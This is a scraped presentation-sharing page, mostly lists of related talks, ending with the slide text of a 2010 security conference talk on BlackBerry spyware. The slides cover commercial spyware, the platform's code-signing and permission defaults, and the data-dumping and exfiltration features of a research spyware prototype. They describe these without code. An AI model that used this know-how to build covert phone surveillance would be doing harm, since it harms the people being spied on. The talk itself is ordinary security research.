Sholove cyren web security - technical datasheet2SHOLOVE INTERNATIONAL LLC
 
Mobile phone as Trusted identity assistant
Mobile phone as Trusted identity assistantMobile phone as Trusted identity assistant
Mobile phone as Trusted identity assistantVladimir Jirasek
 
Mobile Security 101
Mobile Security 101Mobile Security 101
Mobile Security 101Lookout
 
West Chester Tech Blog - Training Class - Session 10
West Chester Tech Blog - Training Class - Session 10West Chester Tech Blog - Training Class - Session 10
West Chester Tech Blog - Training Class - Session 10William Mann
 
Tips of Mobile Application Security
Tips of Mobile Application SecurityTips of Mobile Application Security
Tips of Mobile Application SecurityMarie Weaver
 
Chapter 3_Cyber Security-ccdf.pptx
Chapter 3_Cyber Security-ccdf.pptxChapter 3_Cyber Security-ccdf.pptx
Chapter 3_Cyber Security-ccdf.pptx1SI19IS064TEJASS
 
Protect Your Organization with Multi-Layered Approach to Anti-Phishing
Protect Your Organization with Multi-Layered Approach to Anti-PhishingProtect Your Organization with Multi-Layered Approach to Anti-Phishing
Protect Your Organization with Multi-Layered Approach to Anti-PhishingIvanti
 
Unicom Conference - Mobile Application Security
Unicom Conference - Mobile Application SecurityUnicom Conference - Mobile Application Security
Unicom Conference - Mobile Application SecuritySubho Halder
 
Mobile Payments: Protecting Apps and Data from Emerging Risks
Mobile Payments: Protecting Apps and Data from Emerging RisksMobile Payments: Protecting Apps and Data from Emerging Risks
Mobile Payments: Protecting Apps and Data from Emerging RisksIBM Security
 

Similaire à Shmoocon 2010 - The Monkey Steals the Berries (20)

ISACA CACS 2012 - Mobile Device Security and Privacy
ISACA CACS 2012 - Mobile Device Security and PrivacyISACA CACS 2012 - Mobile Device Security and Privacy
ISACA CACS 2012 - Mobile Device Security and Privacy
 
The Consumerisation of Corporate IT
The Consumerisation of Corporate ITThe Consumerisation of Corporate IT
The Consumerisation of Corporate IT
 
2010: Mobile Security - WHYMCA Developer Conference
2010: Mobile Security - WHYMCA Developer Conference2010: Mobile Security - WHYMCA Developer Conference
2010: Mobile Security - WHYMCA Developer Conference
 
Mobile security - Intense overview
Mobile security - Intense overviewMobile security - Intense overview
Mobile security - Intense overview
 
Cn35499502
Cn35499502Cn35499502
Cn35499502
 
Securing Mobile Banking Apps - You Are Only as Strong as Your Weakest Link
Securing Mobile Banking Apps - You Are Only as Strong as Your Weakest LinkSecuring Mobile Banking Apps - You Are Only as Strong as Your Weakest Link
Securing Mobile Banking Apps - You Are Only as Strong as Your Weakest Link
 
Can You Steal From Me Now? Mobile and BYOD Security Risks
Can You Steal From Me Now? Mobile and BYOD Security RisksCan You Steal From Me Now? Mobile and BYOD Security Risks
Can You Steal From Me Now? Mobile and BYOD Security Risks
 
Building a Mobile App Pen Testing Blueprint
Building a Mobile App Pen Testing BlueprintBuilding a Mobile App Pen Testing Blueprint
Building a Mobile App Pen Testing Blueprint
 
Sholove cyren web security - technical datasheet2
Sholove cyren web security - technical datasheet2Sholove cyren web security - technical datasheet2
Sholove cyren web security - technical datasheet2
 
Mobile Malware
Mobile MalwareMobile Malware
Mobile Malware
 
Mobile phone as Trusted identity assistant
Mobile phone as Trusted identity assistantMobile phone as Trusted identity assistant
Mobile phone as Trusted identity assistant
 
Mobile Security 101
Mobile Security 101Mobile Security 101
Mobile Security 101
 
West Chester Tech Blog - Training Class - Session 10
West Chester Tech Blog - Training Class - Session 10West Chester Tech Blog - Training Class - Session 10
West Chester Tech Blog - Training Class - Session 10
 
Code protection
Code protectionCode protection
Code protection
 
Tips of Mobile Application Security
Tips of Mobile Application SecurityTips of Mobile Application Security
Tips of Mobile Application Security
 
Chapter 3_Cyber Security-ccdf.pptx
Chapter 3_Cyber Security-ccdf.pptxChapter 3_Cyber Security-ccdf.pptx
Chapter 3_Cyber Security-ccdf.pptx
 
Protect Your Organization with Multi-Layered Approach to Anti-Phishing
Protect Your Organization with Multi-Layered Approach to Anti-PhishingProtect Your Organization with Multi-Layered Approach to Anti-Phishing
Protect Your Organization with Multi-Layered Approach to Anti-Phishing
 
Unicom Conference - Mobile Application Security
Unicom Conference - Mobile Application SecurityUnicom Conference - Mobile Application Security
Unicom Conference - Mobile Application Security
 
Mobile Payments: Protecting Apps and Data from Emerging Risks
Mobile Payments: Protecting Apps and Data from Emerging RisksMobile Payments: Protecting Apps and Data from Emerging Risks
Mobile Payments: Protecting Apps and Data from Emerging Risks
 
Trojan horseofbyod2
Trojan horseofbyod2Trojan horseofbyod2
Trojan horseofbyod2
 

Plus de Tyler Shields

The New Mobile Landscape - OWASP Ireland
The New Mobile Landscape - OWASP IrelandThe New Mobile Landscape - OWASP Ireland
The New Mobile Landscape - OWASP IrelandTyler Shields
 
Defending Behind the Mobile Device
Defending Behind the Mobile DeviceDefending Behind the Mobile Device
Defending Behind the Mobile DeviceTyler Shields
 
Avoiding the Pandora Pitfall
Avoiding the Pandora PitfallAvoiding the Pandora Pitfall
Avoiding the Pandora PitfallTyler Shields
 
Social and Mobile and Cloud - OH MY!
Social and Mobile and Cloud - OH MY!Social and Mobile and Cloud - OH MY!
Social and Mobile and Cloud - OH MY!Tyler Shields
 
Social Media Basics: Security Loopholes with Twitter & Other Social Media
Social Media Basics: Security Loopholes with Twitter & Other Social MediaSocial Media Basics: Security Loopholes with Twitter & Other Social Media
Social Media Basics: Security Loopholes with Twitter & Other Social MediaTyler Shields
 
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...Tyler Shields
 
Survey of Rootkit Technologies and Their Impact on Digital Forensics
Survey of Rootkit Technologies and Their Impact on Digital ForensicsSurvey of Rootkit Technologies and Their Impact on Digital Forensics
Survey of Rootkit Technologies and Their Impact on Digital ForensicsTyler Shields
 
Source Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers ViewpointSource Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers ViewpointTyler Shields
 
Source Boston 2010 - The Monkey Steals the Berries Part Deux
Source Boston 2010 - The Monkey Steals the Berries Part DeuxSource Boston 2010 - The Monkey Steals the Berries Part Deux
Source Boston 2010 - The Monkey Steals the Berries Part DeuxTyler Shields
 
Software Developers Forum 2010 - The Monkey Steals the Berries
Software Developers Forum 2010 - The Monkey Steals the BerriesSoftware Developers Forum 2010 - The Monkey Steals the Berries
Software Developers Forum 2010 - The Monkey Steals the BerriesTyler Shields
 
Raleigh ISSA 2010 - The Monkey Steals the Berries
Raleigh ISSA 2010 - The Monkey Steals the BerriesRaleigh ISSA 2010 - The Monkey Steals the Berries
Raleigh ISSA 2010 - The Monkey Steals the BerriesTyler Shields
 
Static Detection of Application Backdoors
Static Detection of Application BackdoorsStatic Detection of Application Backdoors
Static Detection of Application BackdoorsTyler Shields
 
Blackhat Europe 2009 - Detecting Certified Pre Owned Software
Blackhat Europe 2009 - Detecting Certified Pre Owned SoftwareBlackhat Europe 2009 - Detecting Certified Pre Owned Software
Blackhat Europe 2009 - Detecting Certified Pre Owned SoftwareTyler Shields
 
Anti-Debugging - A Developers View
Anti-Debugging - A Developers ViewAnti-Debugging - A Developers View
Anti-Debugging - A Developers ViewTyler Shields
 
Owasp Ireland - The State of Software Security
Owasp Ireland - The State of Software SecurityOwasp Ireland - The State of Software Security
Owasp Ireland - The State of Software SecurityTyler Shields
 
More Apps More Problems
More Apps More ProblemsMore Apps More Problems
More Apps More ProblemsTyler Shields
 
Dirty Little Secret - Mobile Applications Invading Your Privacy
Dirty Little Secret - Mobile Applications Invading Your PrivacyDirty Little Secret - Mobile Applications Invading Your Privacy
Dirty Little Secret - Mobile Applications Invading Your PrivacyTyler Shields
 
IT Hot Topics - Mobile Security Threats at Every Layer
IT Hot Topics - Mobile Security Threats at Every LayerIT Hot Topics - Mobile Security Threats at Every Layer
IT Hot Topics - Mobile Security Threats at Every LayerTyler Shields
 
IT Hot Topics 2010 - The Coming Wave of Smartphone Attacks
IT Hot Topics 2010 - The Coming Wave of Smartphone AttacksIT Hot Topics 2010 - The Coming Wave of Smartphone Attacks
IT Hot Topics 2010 - The Coming Wave of Smartphone AttacksTyler Shields
 
iSec Forum NYC - Smartphone Backdoors an Analysis of Mobile Spyware
iSec Forum NYC - Smartphone Backdoors an Analysis of Mobile SpywareiSec Forum NYC - Smartphone Backdoors an Analysis of Mobile Spyware
iSec Forum NYC - Smartphone Backdoors an Analysis of Mobile SpywareTyler Shields
 

Plus de Tyler Shields (20)

The New Mobile Landscape - OWASP Ireland
The New Mobile Landscape - OWASP IrelandThe New Mobile Landscape - OWASP Ireland
The New Mobile Landscape - OWASP Ireland
 
Defending Behind the Mobile Device
Defending Behind the Mobile DeviceDefending Behind the Mobile Device
Defending Behind the Mobile Device
 
Avoiding the Pandora Pitfall
Avoiding the Pandora PitfallAvoiding the Pandora Pitfall
Avoiding the Pandora Pitfall
 
Social and Mobile and Cloud - OH MY!
Social and Mobile and Cloud - OH MY!Social and Mobile and Cloud - OH MY!
Social and Mobile and Cloud - OH MY!
 
Social Media Basics: Security Loopholes with Twitter & Other Social Media
Social Media Basics: Security Loopholes with Twitter & Other Social MediaSocial Media Basics: Security Loopholes with Twitter & Other Social Media
Social Media Basics: Security Loopholes with Twitter & Other Social Media
 
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
 
Survey of Rootkit Technologies and Their Impact on Digital Forensics
Survey of Rootkit Technologies and Their Impact on Digital ForensicsSurvey of Rootkit Technologies and Their Impact on Digital Forensics
Survey of Rootkit Technologies and Their Impact on Digital Forensics
 
Source Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers ViewpointSource Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers Viewpoint
 
Source Boston 2010 - The Monkey Steals the Berries Part Deux
Source Boston 2010 - The Monkey Steals the Berries Part DeuxSource Boston 2010 - The Monkey Steals the Berries Part Deux
Source Boston 2010 - The Monkey Steals the Berries Part Deux
 
Software Developers Forum 2010 - The Monkey Steals the Berries
Software Developers Forum 2010 - The Monkey Steals the BerriesSoftware Developers Forum 2010 - The Monkey Steals the Berries
Software Developers Forum 2010 - The Monkey Steals the Berries
 
Raleigh ISSA 2010 - The Monkey Steals the Berries
Raleigh ISSA 2010 - The Monkey Steals the BerriesRaleigh ISSA 2010 - The Monkey Steals the Berries
Raleigh ISSA 2010 - The Monkey Steals the Berries
 
Static Detection of Application Backdoors
Static Detection of Application BackdoorsStatic Detection of Application Backdoors
Static Detection of Application Backdoors
 
Blackhat Europe 2009 - Detecting Certified Pre Owned Software
Blackhat Europe 2009 - Detecting Certified Pre Owned SoftwareBlackhat Europe 2009 - Detecting Certified Pre Owned Software
Blackhat Europe 2009 - Detecting Certified Pre Owned Software
 
Anti-Debugging - A Developers View
Anti-Debugging - A Developers ViewAnti-Debugging - A Developers View
Anti-Debugging - A Developers View
 
Owasp Ireland - The State of Software Security
Owasp Ireland - The State of Software SecurityOwasp Ireland - The State of Software Security
Owasp Ireland - The State of Software Security
 
More Apps More Problems
More Apps More ProblemsMore Apps More Problems
More Apps More Problems
 
Dirty Little Secret - Mobile Applications Invading Your Privacy
Dirty Little Secret - Mobile Applications Invading Your PrivacyDirty Little Secret - Mobile Applications Invading Your Privacy
Dirty Little Secret - Mobile Applications Invading Your Privacy
 
IT Hot Topics - Mobile Security Threats at Every Layer
IT Hot Topics - Mobile Security Threats at Every LayerIT Hot Topics - Mobile Security Threats at Every Layer
IT Hot Topics - Mobile Security Threats at Every Layer
 
IT Hot Topics 2010 - The Coming Wave of Smartphone Attacks
IT Hot Topics 2010 - The Coming Wave of Smartphone AttacksIT Hot Topics 2010 - The Coming Wave of Smartphone Attacks
IT Hot Topics 2010 - The Coming Wave of Smartphone Attacks
 
iSec Forum NYC - Smartphone Backdoors an Analysis of Mobile Spyware
iSec Forum NYC - Smartphone Backdoors an Analysis of Mobile SpywareiSec Forum NYC - Smartphone Backdoors an Analysis of Mobile Spyware
iSec Forum NYC - Smartphone Backdoors an Analysis of Mobile Spyware
 

Dernier

Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfPrecisely
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 

Dernier (20)

Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 

Shmoocon 2010 - The Monkey Steals the Berries

  • 1. Blackberry Mobile Spyware The Monkey Steals the Berries Tyler Shields February 5, 2010
  • 2. Outline  Introduction  Case Studies of Mobile Spyware  Blackberry Security Mechanisms  Installation Methods  Effects and Behaviors  Technical Specifications  Methods of Detection and Future Work  Demonstration © 2010 Veracode, Inc. 2
  • 3. Presenter Background Currently Sr. Security Researcher, Veracode, Inc. Previously Security Consultant - Symantec Security Consultant - @Stake Incident Response and Forensics Handler – US Government Wishes He Was Infinitely Rich Personal Trainer to hot Hollywood starlets © 2010 Veracode, Inc. 3
  • 4. Mobile Spyware  Often includes modifications to legitimate programs designed to compromise the device or device data  Often inserted by those who have legitimate access to source code or distribution binaries  May be intentional or inadvertent  Not specific to any particular programming language  Not specific to any particular mobile Operating System © 2010 Veracode, Inc. 4
  • 5. Attacker Motivation  Practical method of compromise for many systems – Let the users install your backdoor on systems you have no access to – Looks like legitimate software so may bypass mobile AV  Retrieve and manipulate valuable private data – Looks like legitimate application traffic so little risk of detection  For high value targets such as financial services and government it becomes cost effective and more reliable – High-end attackers will not be content to exploit opportunistic vulnerabilities, which might be fixed and therefore unavailable at a critical juncture. They may seek to implant vulnerability for later exploitation – Think “Aurora” for Mobile Devices © 2010 Veracode, Inc. 5
  • 6. Back To The Future © 2010 Veracode, Inc. 6
  • 7. Back To The Future © 2010 Veracode, Inc. 7
  • 8. Case Studies of Mobile Spyware © 2010 Veracode, Inc. 8
  • 9. FlexiSpy  http://www.flexispy.com  $149 - $350 PER YEAR depending on features  Features – Remote Listening – C&C Over SMS – SMS and Email Logging – Call History Logging – Location Tracking – Call Interception – GPS Tracking – Symbian, Blackberry, Windows Mobile Supported © 2010 Veracode, Inc. 9
  • 10. FlexiSpy Web Site Quotes  “Download FlexiSPY spyphone software directly onto a mobile phone and receive copies of SMS, Call Logs, Emails, Locations and listen to conversations within minutes of purchase. “  “Catch cheating wives or cheating husbands, stop employee espionage, protect children, make automatic backups, bug meetings rooms etc.”  “F Secure seem to think that its ok for them to interfere with legitimate, legal and accountable software. Who appointed them judge, jury and executioner anyway, and why wont they answer our emails, so we have to ask who is the real malware? Here is how to remove FSecure malware from your device. Please don't believe the fsecure fear mongers who simply wish you to buy their products.” © 2010 Veracode, Inc. 10
  • 11. Mobile Spy  http://www.mobile-spy.com  $49.97 PER QUARTER or $99.97 PER YEAR  Features – SMS Logging – Call Logging – GPS Logging – Web URL Logging – BlackBerry, iPhone (Jailbroken Only), Android, Windows Mobile or Symbian © 2010 Veracode, Inc. 11
  • 12. Mobile Spy Web Site Quotes  “This high-tech spy software will allow you to see exactly what they do while you are away. Are your kids texting while driving or using the phone in all hours of the night? Are your employees sending company secrets? Do they erase their phone logs?”  “Our software is not for use on a phone you do not own or have proper permission to monitor from the user or owner. You must always follow all applicable laws and regulations in your region.”  “Purchased by more than 30,000 customers in over 150 countries” © 2010 Veracode, Inc. 12
  • 13. Etisalat (SS8)  Cell carrier in United Arab Emirates (UAE)  Pushed via SMS as “software patch” for Blackberry smartphones  Upgrade urged to “enhance performance” of Blackberry service  Blackberry PIN messaging as C&C  Sets FLAG_HIDDEN bit to true  Interception of outbound email / SMS only  Discovered due to flooded listener server cause retries that drained batteries of affected devices  Accidentally released the .jar as well as the .cod (ooopsie?!) © 2010 Veracode, Inc. 13
  • 14. Bugs & Phonesnoop  Bugs – Exfiltration of inbound and outbound email – Hidden  PhoneSnoop – Remotely turn on a Blackberry phone microphone – Listen in on target ambient conversation © 2010 Veracode, Inc. 14
  • 15. Storm8 Phone Number Farming – iMobsters and Vampires Live (and others) – “Storm8 has written the software for all its games in such a way that it automatically accesses, collects, and transmits the wireless telephone number of each iPhone user who downloads any Storm8 game," the suit alleges. " ... Storm8, though, has no reason whatsoever to access the wireless phone numbers of the iPhones on which its games are installed." – “Storm8 says that this code was used in development tests, only inadvertently remained in production builds, and removed as soon as it was alerted to the issue.” – These were available via the iTunes App Store! – http://www.boingboing.net/2009/11/05/iphone-game-dev-accu.html © 2010 Veracode, Inc. 15
  • 16. Symbian Sexy Space – Poses as legitimate server ACSServer.exe – Calls itself 'Sexy Space„ – Steals phone and network information – Exfiltrates data via hacker owned web site connection – Can SPAM contact list members – Basically a “botnet” for mobile phones – Signing process  Anti-virus scan using F-Secure - Approx 43% proactive detection rate (PCWorld)  Random selection of inbound manually assessed – Symbian signed this binary as safe! – http://news.zdnet.co.uk/security/0,1000000189,39684313,00.htm © 2010 Veracode, Inc. 16
  • 17. 09Droid – Banking Applications Attack – Droid app that masquerades as any number of different target banking applications – Target banks included  Royal Bank of Canada  Chase  BB&T  SunTrust  Over 50 total financial institutions were affected – May steal and exfiltrate banking credentials – Approved and downloaded from Google’s Android Marketplace! – http://www.theinquirer.net/inquirer/news/1585716/fraud-hits-android-apps- market – http://www.pcadvisor.co.uk/news/index.cfm?RSS&NewsID=3209953 – http://www.f-secure.com/weblog/archives/00001852.html © 2010 Veracode, Inc. 17
  • 18. Blackberry Security Mechanisms © 2010 Veracode, Inc. 18
  • 19. Blackberry Takes Security Seriously  KB05499: Protecting the BlackBerry smartphone and BlackBerry Enterprise Server against malware http://www.blackberry.com/btsc/search.do?cmd=displayKC&docTyp e=kc&externalId=KB05499  Protecting the BlackBerry device platform against malware http://docs.blackberry.com/en/admin/deliverables/1835/Protecting the BlackBerry device platform against malware.pdf  Placing the BlackBerry Enterprise Solution in a segmented network http://docs.blackberry.com/en/admin/deliverables/1460/Placing_the_ BlackBerry_Enterprise_Solution_in_a_Segmented_Network.pdf  BlackBerry Enterprise Server Policy Reference Guide http://docs.blackberry.com/en/admin/deliverables/7228/Policy_Refer ence_Guide.pdf © 2010 Veracode, Inc. 19
  • 20. Does It Really Matter?! Only 23% of smartphone owners use the security software installed on the devices. (Source: Trend Micro Inc. survey of 1,016 U.S. smartphone users, June 2009) 13% of organizations currently protect from mobile viruses (Mobile Security 2009 Survey by Goode Intelligence) © 2010 Veracode, Inc. 20
  • 21. Code Signing  Subset of Blackberry API considered “controlled”  Use of controlled package, class, or method requires appropriate code signature  Blackberry Signature Tool comes with the Blackberry JDE  Acquire signing keys by filling out a web form and paying $20 – This not is a high barrier to entry – 48 hours later you receive signing keys  Install keys into signature tool © 2010 Veracode, Inc. 21
  • 22. Code Signing Process  Hash of code sent to RIM for API tracking purposes only  RIM does not get source code  COD file is signed based on required keys  Application ready to be deployed  Easy to acquire anonymous keys © 2010 Veracode, Inc. 22
  • 23. IT Policies  Requires connection to Blackberry Enterprise Server (BES)  Supersedes lower levels of security restrictions  Prevent devices from downloading third-party applications over wireless  Prevent installation of specific third-party applications  Control permissions of third party applications – Allow Internal Connections – Allow Third-Party Apps to Use Serial Port – Allow External Connections  MOSTLY “Default Allow All” policy for BES and non-BES devices © 2010 Veracode, Inc. 23
  • 24. Application Policies  Can be controlled at the BES  If no BES present, controls are set on the handheld itself  Can only be MORE restrictive than the IT policy, never less  Control individual resource access per application  Control individual connection access per application  MOSTLY “Default Allow All” policy for BES and non-BES devices © 2010 Veracode, Inc. 24
  • 25. V4.7.0.148 Default 3rd Party Application Permissions Bluetooth Phone USB Connections Location Data Connections Connections Internet IPC Device Settings Application Media Themes Input Simulation Management Security Timer Browser Filtering Recording Reset Email Data Organizer Data Files Security Data © 2010 Veracode, Inc. 25
  • 26. V5.0.0.328 Default 3rd Party Application Permissions Bluetooth Phone USB Connections Location Data Connections Connections Server Network Internet IPC Device Settings Application Media Themes Input Simulation Management Security Timer Display Information Browser Filtering Recording Reset While Locked Email Data Organizer Data Files Security Data © 2010 Veracode, Inc. 26
  • 27. V5.0.0.328 Trusted 3rd Party Application Permissions Bluetooth Phone USB Connections Location Data Connections Connections Server Network Internet IPC Device Settings Application Media Themes Input Simulation Management Security Timer Display Information Browser Filtering Recording Reset While Locked Email Data Organizer Data Files Security Data © 2010 Veracode, Inc. 27
  • 28. Installation Methods © 2010 Veracode, Inc. 28
  • 29. Installation Methods  Accessing a web site using the BlackBerry Browser and choosing to download the application over the network (OTA Installation)  Running the application loader tool of the BlackBerry Desktop Manager and choosing to download the application onto the BlackBerry device using a physical connection to the computer  Blackberry BES push the application to your user community  Get it into the Blackberry App World and let the user choose to install it for you! © 2010 Veracode, Inc. 29
  • 30. Installation Files  .COD files: A COD file is a proprietary file format developed by RIM that contains compiled and packaged application code.  .JAD files: An application descriptor that stores information about the application itself and the location of .COD files  .JAR files: a JAR file (or Java ARchive) is used for aggregating many files into one. It is generally used to distribute Java classes and associated metadata.  .ALX files: Similar to the .JAD file, in that it holds information about where the installation files for the application are located © 2010 Veracode, Inc. 30
  • 31. txsBBSpy Effects and Behaviors © 2010 Veracode, Inc. 31
  • 32. txsBBSpy Logging and Dumping Monitor connected / disconnected calls Monitor PIM added / removed / updated Monitor inbound SMS Monitor outbound SMS Real Time track GPS coordinates Dump all contacts Dump current location Dump phone logs Dump email Dump microphone capture (security prompted) © 2010 Veracode, Inc. 32
  • 33. txsBBSpy Exfiltration and C&C Methods SMS (No CDMA) SMS Datagrams (Supports CDMA) Email HTTP GET HTTP POST TCP Socket UDP Socket Command and control hard coded to inbound SMS © 2010 Veracode, Inc. 33
  • 34. txsBBSpy Technical Specifications © 2010 Veracode, Inc. 34
  • 35. Technical Methods  Data Dumpers  Listeners  Exfiltration Methods  Command and Control © 2010 Veracode, Inc. 35
